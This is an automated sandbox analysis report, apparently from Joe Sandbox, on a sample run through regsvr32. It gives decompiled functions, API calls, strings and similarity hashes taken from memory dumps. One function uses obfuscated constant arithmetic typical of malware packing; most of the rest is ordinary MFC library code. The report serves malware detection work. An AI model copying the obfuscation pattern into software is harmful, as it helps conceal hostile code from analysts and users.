0x04f78e35
0x04f78e3b
0x00000000
0x00000000
0x04f78e3d
0x00000000
0x04f78e3b
0x04f78e3f
0x04f78e46
0x04f78e49
0x04f78e55
0x04f78e55
0x04f78e59
0x04f78e59
0x04f78e63
0x04f78e67
0x04f78e6e
0x04f78e79
0x04f78e7a
0x04f78e83
0x04f78e87
0x04f78e8e
0x04f78e95
0x04f78e9c
0x04f78ea3
0x04f78eaa
0x04f78eb1
0x04f78eb8
0x04f78ebf
0x04f78ec6
0x04f78eca
0x04f78ee5
0x04f78eea
0x04f78ef3

Strings

1[, xrefs: 04F78EA3

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1[
API String ID: 0-3081754337
Opcode ID: 31532d86d94716107fd0b73c85ebdad9b6fdb3656001b790f95ac3852afbf581
Instruction ID: 88c2e64ae44c12c9158cfd93b8651078ea73a7daac015fd3c3a660ebf48cba87
Opcode Fuzzy Hash: 31532d86d94716107fd0b73c85ebdad9b6fdb3656001b790f95ac3852afbf581
Instruction Fuzzy Hash: 93410371C00219EBDF48DFE1C94A9EEBBB0FB04308F208589D521B6260E7B95B49DF51

Uniqueness

Uniqueness Score: -1.00%

Function 04F7BDB0 Relevance: 1.3, Strings: 1, Instructions: 58
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F7BDB0(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _t69;
				intOrPtr _t74;
				signed int _t77;

				_v20 = 0x19ef3;
				_v16 = 0x8c462;
				_v16 = 0xf48fd0;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x7f7e669b;
				_v16 = _v16 * 0x56;
				_v16 = _v16 ^ 0x33ef5322;
				_v12 = 0x41cc49;
				_v12 = _v12 ^ 0x1fc1f1b9;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xfffffdfe;
				_v12 = _v12 ^ 0x07e60ef2;
				_v8 = 0x53f934;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 | 0x9e108223;
				_v8 = _v8 ^ 0x9e151e28;
				_t69 =  *0x4f8220c; // 0x0
				E04F75954(_v16, _v12,  *((intOrPtr*)(_t69 + 0x60)), _v8);
				_v12 = 0xbb3a12;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 9;
				_t77 = 0x26;
				_v12 = _v12 * 0x7a;
				_v12 = _v12 ^ 0x0b22f941;
				_v8 = 0x4eafe1;
				_v8 = _v8 / _t77;
				_v8 = _v8 ^ 0xc0cfaded;
				_v8 = _v8 ^ 0xc0c88de0;
				_v16 = 0x9bc2be;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 + 0x3aa5;
				_v16 = _v16 + 0xffff8fa9;
				_v16 = _v16 ^ 0xfff1eca0;
				_t74 =  *0x4f8220c; // 0x0
				return E04F7E4B2(_v12, _v8, _v16, _v16,  *((intOrPtr*)(_t74 + 0x74)));
			}

0x04f7bdb6
0x04f7bdbd
0x04f7bdc4
0x04f7bdcb
0x04f7bdcf
0x04f7bdda
0x04f7bddd
0x04f7bde4
0x04f7bdeb
0x04f7bdf2
0x04f7bdf6
0x04f7bdfd
0x04f7be04
0x04f7be0b
0x04f7be15
0x04f7be1c
0x04f7be26
0x04f7be34
0x04f7be39
0x04f7be42
0x04f7be46
0x04f7be50
0x04f7be51
0x04f7be54
0x04f7be5b
0x04f7be67
0x04f7be6a
0x04f7be71
0x04f7be78
0x04f7be7f
0x04f7be83
0x04f7be8a
0x04f7be91
0x04f7be98
0x04f7beb4

Strings

"S3, xrefs: 04F7BDDD

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "S3
API String ID: 0-716237093
Opcode ID: 124262a5fa7a137769cb2296141921c5be60515abf36eeb6718b8f296eaf6cbb
Instruction ID: cf5ae118f7cbd5b563cf1cab92b6440552a3976a7b1fc75f98813d1cd5a40bb9
Opcode Fuzzy Hash: 124262a5fa7a137769cb2296141921c5be60515abf36eeb6718b8f296eaf6cbb
Instruction Fuzzy Hash: 02319A71D01208EBDB49DFA5D98A89EBBB1FB50314F20C0C9D462AB264D3785B55DF44

Uniqueness

Uniqueness Score: -1.00%

Function 100115BC Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb9621bf995028bf6b3dc7e8eb9c7ae0886ec420e71d790e66368d82521eb6e
Instruction ID: e1c986202d3413e3649d70c5087721d8df5eefb302e823d1be79dd10fad06c5a
Opcode Fuzzy Hash: 7eb9621bf995028bf6b3dc7e8eb9c7ae0886ec420e71d790e66368d82521eb6e
Instruction Fuzzy Hash: 3D21B3769002049FCB14DF69CCC08ABBBA5FF48350B0A85A8E9569F245D731F965CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 10028915 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028915(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x10028922
0x1002892b
0x10028934
0x1002893e
0x10028948
0x10028952
0x1002895c
0x10028966
0x10028970
0x1002897a
0x10028984
0x1002898e
0x10028993
0x1002899a

APIs

RegisterClipboardFormatA.USER32(Native), ref: 10028924
RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002892D
RegisterClipboardFormatA.USER32(ObjectLink), ref: 10028937
RegisterClipboardFormatA.USER32(Embedded Object), ref: 10028941
RegisterClipboardFormatA.USER32(Embed Source), ref: 1002894B
RegisterClipboardFormatA.USER32(Link Source), ref: 10028955
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002895F
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 10028969
RegisterClipboardFormatA.USER32(FileName), ref: 10028973
RegisterClipboardFormatA.USER32(FileNameW), ref: 1002897D
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 10028987
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 10028991

Strings

FileNameW, xrefs: 10028975
OwnerLink, xrefs: 10028926
FileName, xrefs: 1002896B
RichEdit Text and Objects, xrefs: 10028989
Object Descriptor, xrefs: 10028957
Native, xrefs: 1002891D
Link Source Descriptor, xrefs: 10028961
Embedded Object, xrefs: 10028939
Link Source, xrefs: 1002894D
Embed Source, xrefs: 10028943
ObjectLink, xrefs: 1002892F
Rich Text Format, xrefs: 1002897F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: bf7b4985ae92c6bd7c5630eeafef62ad09b9eeabf33068a1c07c41dd6e422063
Instruction ID: 31c0d7829d7537357120e2ccb8a191263865439c3fe81528d26a29f8d241e412
Opcode Fuzzy Hash: bf7b4985ae92c6bd7c5630eeafef62ad09b9eeabf33068a1c07c41dd6e422063
Instruction Fuzzy Hash: 060135708407D89ACB30EFB6AC88C87BAE4EEC47103524D2EE28587610D7759882CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1002695A Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E1002695A(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t98;
				signed int _t103;
				int _t104;
				int _t105;
				void* _t109;
				void* _t113;

				_t42 =  *0x100371f4; // 0x39cf7dc9
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t113 + 0xffffffffffffffc4)) = 0x800;
							_t109 = 1;
							_t103 = 0;
							if(1 <= _t85) {
								L16:
								L17:
								return E10011A49(0, _v8);
							}
							while(E100268C5(_t109, _a4,  *((intOrPtr*)(_t113 + _t103 * 4 - 0x3c))) == _t85) {
								_t103 =  &(1[_t103]);
								if(_t103 < _t109) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, E10026944,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t104 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t104);
						_v60 = ConvertDefaultLocale(_t104);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011A57( &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t105 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t105);
							_t70 = ConvertDefaultLocale(_t105);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t98 = _t72 & 0x3ff;
				_v32 = _t98;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t98);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}

0x10026960
0x1002696e
0x10026975
0x10026978
0x1002697d
0x10026985
0x10026988
0x10026990
0x10026a04
0x10026ab1
0x10026ab5
0x10026aff
0x10026aff
0x10026b07
0x10026b08
0x10026b0c
0x10026b25
0x10026b27
0x10026b33
0x10026b33
0x10026b0e
0x10026b20
0x10026b23
0x00000000
0x00000000
0x00000000
0x10026b23
0x00000000
0x10026b0e
0x10026ac5
0x10026ac8
0x10026ad2
0x00000000
0x00000000
0x10026ad4
0x10026ae6
0x10026af4
0x10026af9
0x10026afc
0x10026afe
0x10026afe
0x00000000
0x10026afe
0x10026a1e
0x10026a29
0x10026a40
0x10026a4f
0x10026a71
0x10026a7a
0x10026a7d
0x10026a88
0x10026a96
0x10026a99
0x10026a9b
0x10026a9d
0x10026aa0
0x10026aa0
0x10026aa4
0x10026aa4
0x00000000
0x10026a29
0x10026992
0x100269a4
0x100269a7
0x100269ae
0x100269b6
0x100269be
0x100269cb
0x100269d4
0x100269d6
0x100269d9
0x100269e0
0x100269eb
0x100269f0
0x100269f3
0x100269f5
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1002697D
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026988
ConvertDefaultLocale.KERNEL32(?), ref: 100269B9
ConvertDefaultLocale.KERNEL32(?), ref: 100269C1
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100269CE
ConvertDefaultLocale.KERNEL32(?), ref: 100269E8
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100269EE
GetVersion.KERNEL32 ref: 100269FC
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10026A21
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10026A47
ConvertDefaultLocale.KERNEL32(?), ref: 10026A93
ConvertDefaultLocale.KERNEL32(76EC4DE0), ref: 10026A99
RegCloseKey.ADVAPI32(?), ref: 10026AA4

Strings

GetSystemDefaultUILanguage, xrefs: 100269C3
GetUserDefaultUILanguage, xrefs: 1002697F
ntdll.dll, xrefs: 10026AAC
kernel32.dll, xrefs: 10026970
Control Panel\Desktop\ResourceLocale, xrefs: 10026A14

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 780041395-483790700
Opcode ID: c8a88ec8f47b05ad6fb245185dc5288cdd2804bb649a9a9da442faf80c01cdf3
Instruction ID: 7e66ab4c7d9ead5553d2abc86c9b376326854eeb3e409b15c23ea205f87c9181
Opcode Fuzzy Hash: c8a88ec8f47b05ad6fb245185dc5288cdd2804bb649a9a9da442faf80c01cdf3
Instruction Fuzzy Hash: C8517E72E00229AEDF10DFE5DC85AEEBEF8EB08354F50403AE900E3140DB7899458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10021B60 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E10021B60(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x100371f4; // 0x39cf7dc9
				_push(E100272A4);
				_v8 = _t52;
				_t90 = E100285E7(0x100381c0);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_t99 =  *_a12;
					_t56 =  *(E10027747() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1003a0ec == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x10039b40 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x10039b40) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, E10021A08);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E10012400( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x10039b40 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10012518( &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E10020ACD(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002113E);
							if(_t81 != E1002113E) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E10011A49(_t60, _v8);
				}
			}

0x10021b69
0x10021b6f
0x10021b79
0x10021b85
0x10021b87
0x10021ba4
0x10021ba8
0x10021bb1
0x10021bb5
0x10021bb8
0x10021bd3
0x10021c23
0x10021c25
0x10021c6c
0x10021ca9
0x10021cbb
0x10021cf2
0x10021cf7
0x10021cff
0x10021d02
0x10021d0a
0x10021d17
0x10021d20
0x10021d2f
0x10021d32
0x10021d42
0x10021d42
0x10021d2f
0x10021d17
0x00000000
0x10021d02
0x00000000
0x10021cbd
0x10021c70
0x10021c7b
0x10021c89
0x10021c98
0x10021ca1
0x10021ca7
0x10021cd9
0x00000000
0x00000000
0x10021ce3
0x10021cf0
0x00000000
0x00000000
0x00000000
0x10021cf0
0x00000000
0x10021ca7
0x10021c2c
0x10021c35
0x10021c4d
0x10021c4f
0x10021c57
0x10021c59
0x10021c59
0x10021c5b
0x00000000
0x10021c5b
0x10021be5
0x00000000
0x00000000
0x10021beb
0x10021bf3
0x10021c01
0x10021c06
0x10021c0c
0x10021c0c
0x10021c1d
0x00000000
0x00000000
0x00000000
0x10021d48
0x10021d48
0x10021d5d
0x10021d5f
0x10021d64
0x10021d6a
0x10021d6a
0x10021d6f
0x00000000
0x10021d71
0x10021b89
0x10021b95
0x10021d72
0x10021d7c
0x10021d7c

APIs

Part of subcall function 100285E7: __EH_prolog.LIBCMT ref: 100285EC

CallNextHookEx.USER32 ref: 10021B95
GetClassLongA.USER32 ref: 10021BDA
GlobalGetAtomNameA.KERNEL32 ref: 10021C06
lstrcmpiA.KERNEL32(?,ime,?,?,100272A4), ref: 10021C15
SetWindowLongA.USER32(?,000000FC,Function_0002113E), ref: 10021C4F
CallNextHookEx.USER32 ref: 10021D53
UnhookWindowsHookEx.USER32(?), ref: 10021D64

Strings

ime, xrefs: 10021C0F
AfxOldWndProc423, xrefs: 10021D0A, 10021D0F, 10021D1C, 10021D26, 10021D31
#32768, xrefs: 10021C90, 10021C95, 10021CE1

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
String ID: #32768$AfxOldWndProc423$ime
API String ID: 3204395069-4034971020
Opcode ID: 923eef9dd91d4174ed10fd3cb48fd684776ebcdb7cc3cd8fe7fd22e0e5c3795c
Instruction ID: 7ccca2d111f462454a1591929b606a3c27235dd0c2c2c0b15024cba99a7efe61
Opcode Fuzzy Hash: 923eef9dd91d4174ed10fd3cb48fd684776ebcdb7cc3cd8fe7fd22e0e5c3795c
Instruction Fuzzy Hash: 1951C339500269EFDB11DF60EC88BDD7BB9FF183A1FA14165F914AA1A1C730DA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10007FDE Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007FDE() {
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100399ec; // 0x0
				if(_t23 == 0) {
					 *0x100399f0 = E10007F91();
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x100399d0 = 0;
						 *0x100399d4 = 0;
						 *0x100399d8 = 0;
						 *0x100399dc = 0;
						 *0x100399e0 = 0;
						 *0x100399e4 = 0;
						 *0x100399e8 = 0;
						 *0x100399ec = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x100399d0 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x100399d4 = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x100399d8 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x100399dc = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x100399e4 = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x100399e0 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x100399e8 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x100399ec = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x100399e0; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x10007fe1
0x10007fe7
0x10008002
0x1000800d
0x10008011
0x1000809e
0x1000809e
0x100080a4
0x100080aa
0x100080b0
0x100080b6
0x100080bc
0x100080c2
0x100080c8
0x100080d2
0x10008017
0x10008023
0x10008027
0x1000802c
0x00000000
0x1000802e
0x10008034
0x10008038
0x1000803d
0x00000000
0x1000803f
0x10008045
0x10008049
0x1000804e
0x00000000
0x10008050
0x10008056
0x1000805a
0x1000805f
0x00000000
0x10008061
0x10008067
0x1000806b
0x10008070
0x00000000
0x10008072
0x10008078
0x1000807c
0x10008081
0x00000000
0x10008083
0x10008089
0x1000808d
0x10008092
0x00000000
0x10008094
0x10008096
0x10008097
0x10008097
0x10008092
0x10008081
0x10008070
0x1000805f
0x1000804e
0x1000803d
0x1000802c
0x100080d7
0x10007fe9
0x10007feb
0x10007ff5
0x10007ff5

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,1000812F), ref: 10008007
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 10008023
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 10008034
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10008045
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10008056
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10008067
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10008078
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10008089

Strings

GetMonitorInfoA, xrefs: 10008072
EnumDisplayMonitors, xrefs: 10008061
MonitorFromRect, xrefs: 1000803F
MonitorFromWindow, xrefs: 1000802E
MonitorFromPoint, xrefs: 10008050
USER32, xrefs: 10007FFD
GetSystemMetrics, xrefs: 1000801D
EnumDisplayDevicesA, xrefs: 10008083

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: c93b96fe13b95e912f4d2d8e059c62a8ca00f1ac8a7e19ff652396150d5c17ed
Instruction ID: 5875a88fa52cc7419f87466d3cb8e46c9f590408e74f8792abd6e8fcf3c29728
Opcode Fuzzy Hash: c93b96fe13b95e912f4d2d8e059c62a8ca00f1ac8a7e19ff652396150d5c17ed
Instruction Fuzzy Hash: F0216D70D022299EF783DF7E9CC1A6ABAE4F7482C0391043FD288DA122DB704849CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10016F7C Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E10016F7C() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x100371f4; // 0x39cf7dc9
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x10037a90 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
